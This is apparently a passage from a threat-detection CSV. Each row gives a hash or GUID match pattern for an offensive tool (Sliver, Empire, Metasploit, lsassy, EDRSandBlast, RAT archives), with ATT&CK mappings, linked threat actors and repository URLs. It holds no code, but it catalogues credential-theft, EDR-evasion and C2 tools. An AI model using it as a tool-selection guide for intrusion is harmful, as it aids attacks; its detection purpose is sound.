"*7e2a0b36073628e014853163888d45cd84994109cdc61267706d3c9f63b97ed3*",".{0,1000}7e2a0b36073628e014853163888d45cd84994109cdc61267706d3c9f63b97ed3.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","29731"
"*7e3584959c0b499046b43d241e6199b64878655ba0c56319590ecb75eb14acd9*",".{0,1000}7e3584959c0b499046b43d241e6199b64878655ba0c56319590ecb75eb14acd9.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","29732"
"*7e3763413eb0fd5cd4a0e4d9c90e37cc7325ba05ffec2487fd32a3a7ec0e8137*",".{0,1000}7e3763413eb0fd5cd4a0e4d9c90e37cc7325ba05ffec2487fd32a3a7ec0e8137.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","29733"
"*7e3de37367d5aaa89be6034e8afc57740bd50397b244fcf7690dde4299f724e9*",".{0,1000}7e3de37367d5aaa89be6034e8afc57740bd50397b244fcf7690dde4299f724e9.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","29738"
"*7E3E2ECE-D1EB-43C6-8C83-B52B7571954B*",".{0,1000}7E3E2ECE\-D1EB\-43C6\-8C83\-B52B7571954B.{0,1000}","offensive_tool_keyword","EDRSandBlast","EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","COZY BEAR","Defense Evasion","https://github.com/wavestone-cdt/EDRSandblast","1","0","#GUIDproject","N/A","10","10","1633","292","2024-08-30T20:30:31Z","2021-11-02T15:02:42Z","29739"
"*7E3E2ECE-D1EB-43C6-8C83-B52B7571954B*",".{0,1000}7E3E2ECE\-D1EB\-43C6\-8C83\-B52B7571954B.{0,1000}","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","COZY BEAR","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","#GUIDproject","N/A","10","3","260","48","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z","29740"
"*7e40488e6ce8545eccdcfd13124e609ff74c50a9ce89bc88b9b2b50862efda9c*",".{0,1000}7e40488e6ce8545eccdcfd13124e609ff74c50a9ce89bc88b9b2b50862efda9c.{0,1000}","offensive_tool_keyword","ShellPwnsh","Reverse Shell in Golang and PowerShell Fud","T1059.001 - T1573.002 - T1105","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/BlackShell256/ShellPwnsh","1","0","#filehash","N/A","9","10","9","6","2022-05-01T08:42:54Z","2022-04-28T01:26:08Z","29741"
"*7e45d5def0e8c355baf38688273584fa1e9e5c2d245d1535b5c965ce568d8a13*",".{0,1000}7e45d5def0e8c355baf38688273584fa1e9e5c2d245d1535b5c965ce568d8a13.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","29742"
"*7E47D586-DDC6-4382-848C-5CF0798084E1*",".{0,1000}7E47D586\-DDC6\-4382\-848C\-5CF0798084E1.{0,1000}","offensive_tool_keyword","ShadowSpray","A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.","T1110.003 - T1098 - T1059 - T1075","TA0001 - TA0008 - TA0009","N/A","Black Basta","Discovery","https://github.com/ShorSec/ShadowSpray","1","0","#GUIDproject","N/A","7","5","459","80","2022-10-14T13:36:51Z","2022-10-10T08:34:07Z","29744"
"*7E47D586-DDC6-4382-848C-5CF0798084E1*",".{0,1000}7E47D586\-DDC6\-4382\-848C\-5CF0798084E1.{0,1000}","offensive_tool_keyword","ShadowSpray","A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.","T1556.005 - T1098.001 - T1098","TA0006 - TA0008 - TA0004","N/A","Black Basta","Credential Access","https://github.com/Dec0ne/ShadowSpray","1","0","#GUIDproject","N/A","10","5","459","80","2022-10-14T13:36:51Z","2022-10-10T08:34:07Z","29745"
"*7e4fc58a02442bd5021c2a0b1bc032a1b65dfa1dbb182fc9a13e4716da7c51d9*",".{0,1000}7e4fc58a02442bd5021c2a0b1bc032a1b65dfa1dbb182fc9a13e4716da7c51d9.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","#filehash","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","29746"
"*7e51d4af53fe54a5b886d342e26a5b87619c7e1ba29f014012e7e30f157dcd4e*",".{0,1000}7e51d4af53fe54a5b886d342e26a5b87619c7e1ba29f014012e7e30f157dcd4e.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","29747"
"*7e54ae9d348b3235d8582789274b78d92907907478efc94939204fe62921e1c7*",".{0,1000}7e54ae9d348b3235d8582789274b78d92907907478efc94939204fe62921e1c7.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","29748"
"*7e5d70e9ea31688ed3b6192e0f4bc7ba02b6d3fc772598ac187c02275a44cc02*",".{0,1000}7e5d70e9ea31688ed3b6192e0f4bc7ba02b6d3fc772598ac187c02275a44cc02.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","#filehash","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","29751"
"*7e643e4b2ed8bc2dda5c6d450f16a8d2ca38ad306ef26c351cec58db97d237a7*",".{0,1000}7e643e4b2ed8bc2dda5c6d450f16a8d2ca38ad306ef26c351cec58db97d237a7.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","29752"
"*7e6b9406c2a12c93a7c56e4e2c79dd4eb1e562c772aef13ebd006abb727a2854*",".{0,1000}7e6b9406c2a12c93a7c56e4e2c79dd4eb1e562c772aef13ebd006abb727a2854.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","#filehash","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","29754"
"*7e6e3c02e49c8405a5680d9058fd328683b4f1d10fb9d40d9d16277cc80cacf3*",".{0,1000}7e6e3c02e49c8405a5680d9058fd328683b4f1d10fb9d40d9d16277cc80cacf3.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","29755"
"*7e6e4d4f8d52c0b8ed9b71fa0d0fad11872d1ee4204fc3f4835eb70932047883*",".{0,1000}7e6e4d4f8d52c0b8ed9b71fa0d0fad11872d1ee4204fc3f4835eb70932047883.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","29756"
"*7e79f9041f4009d963ab05ffee97702646026b16bed9694e059b813c261b973c*",".{0,1000}7e79f9041f4009d963ab05ffee97702646026b16bed9694e059b813c261b973c.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","29758"
"*7e7c5b1923a84ddf3fcf224536dd9c917bd12ce73d5e512ee293fb6f44dc1bb4*",".{0,1000}7e7c5b1923a84ddf3fcf224536dd9c917bd12ce73d5e512ee293fb6f44dc1bb4.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","#filehash","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","29759"
"*7e94404dc46259916898e5400c4511f885e873dd0fe75357c178053b60b6f7ed*",".{0,1000}7e94404dc46259916898e5400c4511f885e873dd0fe75357c178053b60b6f7ed.{0,1000}","offensive_tool_keyword","defender-control","An open-source windows defender manager. Now you can disable windows defender permanently","T1562.001 - T1562.004 - T1089","TA0005 - TA0002","N/A","LockBit","Defense Evasion","https://github.com/pgkt04/defender-control","1","0","#filehash","N/A","10","10","1614","128","2023-09-09T14:57:56Z","2021-05-15T10:09:17Z","29762"
"*7e95bcfab0010c0c17569f50af87efd1beb4e81952ad8b24166643353a39fa25*",".{0,1000}7e95bcfab0010c0c17569f50af87efd1beb4e81952ad8b24166643353a39fa25.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","29763"
"*7E9729AA-4CF2-4D0A-8183-7FB7CE7A5B1A*",".{0,1000}7E9729AA\-4CF2\-4D0A\-8183\-7FB7CE7A5B1A.{0,1000}","offensive_tool_keyword","Crassus","Crassus Windows privilege escalation discovery tool","T1068 - T1003 - T1003.003 - T1046","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/vu-ls/Crassus","1","0","#GUIDproject","N/A","10","6","571","59","2024-11-08T14:11:39Z","2023-01-12T21:01:52Z","29764"
"*7ea18c700dcc3444fb59a36f589613bb97c3d17ed8ad43e005cae75d35e61f60*",".{0,1000}7ea18c700dcc3444fb59a36f589613bb97c3d17ed8ad43e005cae75d35e61f60.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","29765"
"*7ea370e3fb26387369e0d4f173cbf6df072ab2f6b3c4de43795e6fc1c1e74af3*",".{0,1000}7ea370e3fb26387369e0d4f173cbf6df072ab2f6b3c4de43795e6fc1c1e74af3.{0,1000}","offensive_tool_keyword","burp-log4shell","Log4Shell scanner for Burp Suite","T1190 - T1059.008 - T1071.001","TA0001 - TA0002 - TA0011","N/A","Dispossessor","Exploitation tool","https://github.com/silentsignal/burp-log4shell","1","0","#filehash","N/A","8","5","484","72","2023-09-24T08:29:56Z","2021-12-12T14:52:49Z","29766"
"*7ea564978060c0773bf97da056d612768bcc47cf4bd0bd7b1a98c5b61bd00af1*",".{0,1000}7ea564978060c0773bf97da056d612768bcc47cf4bd0bd7b1a98c5b61bd00af1.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","29767"
"*7eaaaa6fe51a14b8e5ad3f4163024c3230ef8ca9f1c0b5b039ba16b6a11fbf7d*",".{0,1000}7eaaaa6fe51a14b8e5ad3f4163024c3230ef8ca9f1c0b5b039ba16b6a11fbf7d.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","29770"
"*7EAE7E78-ED95-4CAB-B3B3-231B41BB5AA0*",".{0,1000}7EAE7E78\-ED95\-4CAB\-B3B3\-231B41BB5AA0.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#GUIDproject","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","29771"
"*7eafe227a92bd29f811ecf7457d7170ffe65962b5048a8b431c68bc1121fac21*",".{0,1000}7eafe227a92bd29f811ecf7457d7170ffe65962b5048a8b431c68bc1121fac21.{0,1000}","offensive_tool_keyword","RealBlindingEDR","AV/EDR evasion","T1562.001 - T1548.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/myzxcg/RealBlindingEDR","1","0","#filehash","N/A","10","10","1050","190","2024-06-21T03:16:55Z","2023-10-28T07:06:53Z","29772"
"*7eb2d2b7d0eaf25f822afa65e9887683ad2c1dd48c2cc447a76a6526222acf06*",".{0,1000}7eb2d2b7d0eaf25f822afa65e9887683ad2c1dd48c2cc447a76a6526222acf06.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","0","#filehash","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","29773"
"*7ebe05cf3029272503d357300458d6bf36cde819120533d8ed84c1f9888dfc94*",".{0,1000}7ebe05cf3029272503d357300458d6bf36cde819120533d8ed84c1f9888dfc94.{0,1000}","offensive_tool_keyword","sish","An open source serveo/ngrok alternative. HTTP(S)/WS(S)/TCP Tunnels to localhost using only SSH","T1572 - T1090.002","TA0010 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antoniomika/sish","1","0","#filehash","N/A","10","10","4203","325","2025-04-10T20:04:08Z","2019-02-15T15:36:23Z","29777"
"*7ec9b36feeace5d4903be2adb2e1454af948a393c311b5513bfad0e9995b87e7*",".{0,1000}7ec9b36feeace5d4903be2adb2e1454af948a393c311b5513bfad0e9995b87e7.{0,1000}","offensive_tool_keyword","DecryptTeamViewer","Enumerate and decrypt TeamViewer credentials from Windows registry","T1552.001 - T1003 - T1119 - T1012","TA0006 - TA0007 - TA0008","N/A","N/A","Credential Access","https://github.com/V1V1/DecryptTeamViewer","1","0","#filehash","N/A","7","3","241","62","2021-12-05T09:19:56Z","2020-02-07T07:50:47Z","29782"
"*7ed7d9c107405d53c44b675f0c2cbb042388f49801d90a55d4820d83fa908d91",".{0,1000}7ed7d9c107405d53c44b675f0c2cbb042388f49801d90a55d4820d83fa908d91","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","0","#filehash","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","29783"
"*7ee2ae92197926fc349bebbf9c6065aa54f994234d543a58725f4dda99699afa*",".{0,1000}7ee2ae92197926fc349bebbf9c6065aa54f994234d543a58725f4dda99699afa.{0,1000}","offensive_tool_keyword","subbrute","A DNS meta-query spider that enumerates DNS records and subdomains.","T1071.001 - T1083 - T1590.001","TA0043 - TA0007?","N/A","ENERGETIC BEAR","Reconnaissance","https://github.com/TheRook/subbrute","1","0","#filehash","N/A","5","10","3422","661","2022-01-13T09:25:59Z","2012-06-10T01:08:20Z","29786"
"*7EE536AE-6C1D-4881-88F7-37C8F2A0CA50*",".{0,1000}7EE536AE\-6C1D\-4881\-88F7\-37C8F2A0CA50.{0,1000}","offensive_tool_keyword","DirCreate2System","Weaponizing to get NT SYSTEM for Privileged Directory Creation Bugs with Windows Error Reporting","T1068 - T1059.001 - T1070.004","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/binderlabs/DirCreate2System","1","0","#GUIDproject","N/A","8","4","357","38","2022-12-19T17:00:43Z","2022-12-15T03:49:55Z","29787"
"*7ee75a2b8e9ac772f17dfc622e4f5011507648c0dc4c863e69a019ffff1da55c*",".{0,1000}7ee75a2b8e9ac772f17dfc622e4f5011507648c0dc4c863e69a019ffff1da55c.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","29788"
"*7ef63c297547732a817bb5372198a567ad572fe7b0093d69c68c443af4c055b4*",".{0,1000}7ef63c297547732a817bb5372198a567ad572fe7b0093d69c68c443af4c055b4.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","29789"
"*7ef6a655e0c09263822565e5022ff3bd33494f1bedc2062862f769ebd2c93897*",".{0,1000}7ef6a655e0c09263822565e5022ff3bd33494f1bedc2062862f769ebd2c93897.{0,1000}","offensive_tool_keyword","RDPCredentialStealer","RDPCredentialStealer it's a malware that steal credentials provided by users in RDP using API Hooking with Detours in C++","T1555.001 - T1059.002 - T1552.002","TA0006 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/S12cybersecurity/RDPCredentialStealer","1","0","#filehash","N/A","10","3","245","37","2023-06-14T10:25:33Z","2023-06-13T01:30:26Z","29790"
"*7efd3d96188347367d021982adb458d1ab44d27dc5d3a3ac44e984481af2ad32*",".{0,1000}7efd3d96188347367d021982adb458d1ab44d27dc5d3a3ac44e984481af2ad32.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","29791"
"*7etsuo/ShellServe*",".{0,1000}7etsuo\/ShellServe.{0,1000}","offensive_tool_keyword","ShellServe","Multi-client network fileserver with integrated shell functionality crafted in C using system calls for efficient and direct file and command processing","T1059 - T1505 - T1046 - T1569","TA0002 - TA0007 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/7etsuo/ShellServe","1","1","N/A","N/A","6","","N/A","","","","29793"
"*7f005c1ea9c2021b5db5807fdf9e8e9f502b28f089ff17dc85b7d480a3e3d143*",".{0,1000}7f005c1ea9c2021b5db5807fdf9e8e9f502b28f089ff17dc85b7d480a3e3d143.{0,1000}","offensive_tool_keyword","DriverDump","abusing the old process explorer driver to grab a privledged handle to lsass and then dump it","T1543 - T1548 - T1562 - T1003 - T1569","TA0005 - TA0003 - TA0004 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/trustedsec/The_Shelf","1","0","#filehash","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","29794"
"*7f04947064e9386df22e3d4da45d2687c13b1490de3669c5d3f1087698392cd9*",".{0,1000}7f04947064e9386df22e3d4da45d2687c13b1490de3669c5d3f1087698392cd9.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","29796"
"*7f049ca9ba7182193eb8c129ea0b090d498a2978fa66e36ceeab62e0be124592*",".{0,1000}7f049ca9ba7182193eb8c129ea0b090d498a2978fa66e36ceeab62e0be124592.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","29797"
"*7f093d1243dd87e82bbaf8ef261269466ca01a142b6a52c6fa145a8ec4ba3e3d*",".{0,1000}7f093d1243dd87e82bbaf8ef261269466ca01a142b6a52c6fa145a8ec4ba3e3d.{0,1000}","offensive_tool_keyword","gTunnel","tunelling solution written in golang","T1573.002 - T1071 - T1090 - T1105 - T1020","TA0005 - TA0010 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hotnops/gTunnel","1","0","#filehash","N/A","10","10","266","49","2023-05-17T05:24:58Z","2020-03-09T02:52:48Z","29799"
"*7f0b1f1e301cdf0058203bbaee22dae51f023e73409ac60278da05cfa0fa7a23*",".{0,1000}7f0b1f1e301cdf0058203bbaee22dae51f023e73409ac60278da05cfa0fa7a23.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","29800"
